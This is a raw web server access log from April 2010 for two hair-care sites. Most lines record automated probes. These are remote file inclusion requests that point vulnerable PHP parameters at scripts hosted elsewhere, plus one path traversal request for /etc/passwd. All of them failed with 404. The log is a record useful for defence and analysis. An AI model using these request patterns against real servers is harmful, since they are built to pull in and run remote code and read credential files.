91.201.64.7 - - [05/Apr/2010:09:14:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "growlonghairfast.com"
91.201.64.7 - - [05/Apr/2010:09:14:50 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "growlonghairfast.com"
82.192.65.135 - - [05/Apr/2010:09:15:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.192.65.135 - - [05/Apr/2010:09:15:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.192.65.135 - - [05/Apr/2010:09:15:02 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [05/Apr/2010:09:15:10 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://doyac.kr/id/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.216.43.133 - - [05/Apr/2010:09:15:12 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://doyac.kr/id/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:15:17 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:15:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:15:22 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:16:24 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.192.65.135 - - [05/Apr/2010:09:16:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.192.65.135 - - [05/Apr/2010:09:16:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.192.65.135 - - [05/Apr/2010:09:16:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:16:35 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:16:35 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:17:59 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:17:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:18:00 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:18:05 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:18:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:18:05 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:19:27 -0700] "GET /logs/access_091207.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:19:28 -0700] "GET /logs/access_091207.log//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:24:56 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:24:56 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:24:56 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:25:08 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:25:08 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:25:08 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:30:04 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:30:04 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:30:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:30:04 -0700] "GET /logs/access_091207.log%20%20//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.150.216.211 - - [05/Apr/2010:09:30:19 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.150.216.211 - - [05/Apr/2010:09:30:21 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.150.216.211 - - [05/Apr/2010:09:30:21 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.201.64.7 - - [05/Apr/2010:09:33:26 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "freehairsecrets.com"
91.201.64.7 - - [05/Apr/2010:09:33:26 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:34:02 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:34:20 -0700] "GET /skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:34:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:34:20 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.192.65.135 - - [05/Apr/2010:09:34:20 -0700] "GET /logs/access_091207.log%20%20//skin/zero_vote/error.php?dir=http://minarik-pila.cz//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:34:33 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.70.32.2 - - [05/Apr/2010:09:47:48 -0700] "GET /logs/access_100104.log%20%20//errors.php?error=http://bvc.interfree.it/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.70.32.2 - - [05/Apr/2010:09:47:48 -0700] "GET /logs//errors.php?error=http://bvc.interfree.it/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.70.32.2 - - [05/Apr/2010:09:47:48 -0700] "GET /errors.php?error=http://bvc.interfree.it/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [05/Apr/2010:09:48:33 -0700] "GET /logs/access.log//index2.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:48:33 -0700] "GET /logs//index2.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:48:33 -0700] "GET /index2.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:49:33 -0700] "GET /index2.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:49:33 -0700] "GET /logs/access.log%20%20//index2.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.95.229.230 - - [05/Apr/2010:09:49:33 -0700] "GET /logs//index2.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/admin/styles/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.217.216.132 - - [05/Apr/2010:09:50:59 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [05/Apr/2010:09:50:59 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [05/Apr/2010:09:50:59 -0700] "GET /logs/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [05/Apr/2010:09:52:30 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [05/Apr/2010:09:52:30 -0700] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [05/Apr/2010:09:52:30 -0700] "GET /bbs/write_update.php?board_skin_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [05/Apr/2010:10:10:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:10:10:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
81.93.240.44 - - [05/Apr/2010:10:35:04 -0700] "GET /write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:10:35:08 -0700] "GET /logs//write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:10:35:09 -0700] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.70.122.162 - - [05/Apr/2010:10:42:04 -0700] "GET /addpost_newpoll.php?addpoll=preview&thispath=http://www.mylizabee.com/hajar/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.70.122.162 - - [05/Apr/2010:10:42:04 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.mylizabee.com/hajar/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.70.122.162 - - [05/Apr/2010:10:42:04 -0700] "GET /logs/access_100104.log%20%20//addpost_newpoll.php?addpoll=preview&thispath=http://www.mylizabee.com/hajar/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.48.206.106 - - [05/Apr/2010:10:47:48 -0700] "GET /main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.48.206.106 - - [05/Apr/2010:10:47:48 -0700] "GET /logs/access_100315.log%20%20//main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.48.206.106 - - [05/Apr/2010:10:47:48 -0700] "GET /logs//main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.70.122.162 - - [05/Apr/2010:10:49:53 -0700] "GET /logs/access_100104.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.mylizabee.com/hajar/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.203.90 - - [05/Apr/2010:10:52:26 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "growlonghairfast.com"
174.121.17.40 - - [05/Apr/2010:10:56:27 -0700] "GET /index.php?option=com_joomlaupdater&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
174.121.17.40 - - [05/Apr/2010:10:56:27 -0700] "GET /index.php?option=com_joomlaupdater&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
203.251.80.167 - - [05/Apr/2010:10:58:50 -0700] "GET /logs/access_091228.log%20%20///configuration.php?mosConfig_absolute_path=http://intranet.fortransris.net/modules/admin/images/helix-setup-user4.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.251.80.167 - - [05/Apr/2010:10:58:50 -0700] "GET /logs///configuration.php?mosConfig_absolute_path=http://intranet.fortransris.net/modules/admin/images/helix-setup-user4.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.251.80.167 - - [05/Apr/2010:10:58:50 -0700] "GET //configuration.php?mosConfig_absolute_path=http://intranet.fortransris.net/modules/admin/images/helix-setup-user4.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.48.206.106 - - [05/Apr/2010:10:59:06 -0700] "GET /logs/access_100315.log//main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:01:18 -0700] "GET /main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:01:18 -0700] "GET /logs//main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:01:18 -0700] "GET /logs/access_100315.log%20%20//main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:02:38 -0700] "GET /logs//main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:02:38 -0700] "GET /logs/access_100315.log%20%20//main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:02:38 -0700] "GET /main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.48.206.106 - - [05/Apr/2010:11:04:23 -0700] "GET /logs/access.log//main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.48.206.106 - - [05/Apr/2010:11:04:23 -0700] "GET /logs//main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.48.206.106 - - [05/Apr/2010:11:04:23 -0700] "GET /main.php?sayfa=http://www.go2play.com.hk/attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.93.240.44 - - [05/Apr/2010:11:05:35 -0700] "GET /write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:11:05:37 -0700] "GET /logs//write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:11:05:37 -0700] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:11:06:53 -0700] "GET /logs//write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:11:06:53 -0700] "GET /write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.44 - - [05/Apr/2010:11:06:53 -0700] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [05/Apr/2010:11:08:52 -0700] "GET /logs/access_090511.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:53 -0700] "GET /logs/access_090518.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:54 -0700] "GET /logs/access_090525.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:55 -0700] "GET /logs/access_090601.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:56 -0700] "GET /logs/access_090608.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:57 -0700] "GET /logs/access_090615.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:58 -0700] "GET /logs/access_090622.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:08:59 -0700] "GET /logs/access_090629.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:09:00 -0700] "GET /logs/access_090706.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [05/Apr/2010:11:09:01 -0700] "GET /logs/access_090713.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
84.40.30.37 - - [05/Apr/2010:11:13:22 -0700] "GET /logs/access_100315.log//main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [05/Apr/2010:11:13:28 -0700] "GET /logs/access_100315.log//main.php?sayfa=http://doyac.kr/id/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.145.81.2 - - [05/Apr/2010:11:27:02 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rampage-ro.com/OLD%20FILES/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.145.81.2 - - [05/Apr/2010:11:27:02 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rampage-ro.com/OLD%20FILES/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.145.81.2 - - [05/Apr/2010:11:27:02 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rampage-ro.com/OLD%20FILES/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [05/Apr/2010:11:41:21 -0700] "GET /logs/bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [05/Apr/2010:11:41:21 -0700] "GET /logs/access.log%20%20/bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [05/Apr/2010:11:41:21 -0700] "GET /bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [05/Apr/2010:11:41:24 -0700] "GET /logs/bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [05/Apr/2010:11:41:24 -0700] "GET /bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [05/Apr/2010:11:41:24 -0700] "GET /logs/access.log%20%20/bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [05/Apr/2010:11:41:24 -0700] "GET /logs/bbs///////delete_comment.php?board_skin_path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
